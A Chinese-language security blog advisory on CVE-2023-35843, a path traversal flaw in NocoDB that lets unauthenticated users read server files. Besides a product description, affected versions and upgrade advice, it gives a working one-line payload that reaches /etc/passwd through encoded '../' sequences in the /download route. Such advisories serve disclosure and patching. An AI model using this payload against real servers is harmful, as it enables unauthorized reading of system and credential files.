探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-35843:NocoDB 任意文件读取漏洞

漏洞说明

NocoDB 是一个免费的开源工具,可以在任何数据库上创建智能电子表格和 REST APIs。NocoDB 的工作原理是连接到任何关系数据库并将它们转换为智能电子表格界面 + 为您提供即时 REST API! 这允许您与团队协作构建无代码应用程序。NocoDB 目前适用于 MySQL、PostgreSQL、Microsoft SQL Server、SQLite、Amazon Aurora 和 MariaDB 数据库。

NocoDB 和我们之前介绍的 SeaTable 非常类似,区别在于 SeaTable 偏向于提供应用模板,而 NocoDB 偏向于提供接口,是一个从数据库到 REST-GraphQL API 的生成器,更方便做二次开发。

漏洞描述

NocoDB 到 0.106.0(或 0.109.1)存在路径遍历漏洞,允许未经身份验证的攻击者通过操纵 /download 路由的路径参数来访问服务器上的任意文件。此漏洞可能允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息。

影响版本

NocoDB <= 0.106.1

漏洞复现

payload:

/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

CVE-2023-35843:NocoDB 任意文件读取漏洞-威武网安

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

赞(0) 打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-35843:NocoDB 任意文件读取漏洞》
文章链接:https://www.wevul.com/1701.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

评论 抢沙发

如果文章对你有帮助 可以打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册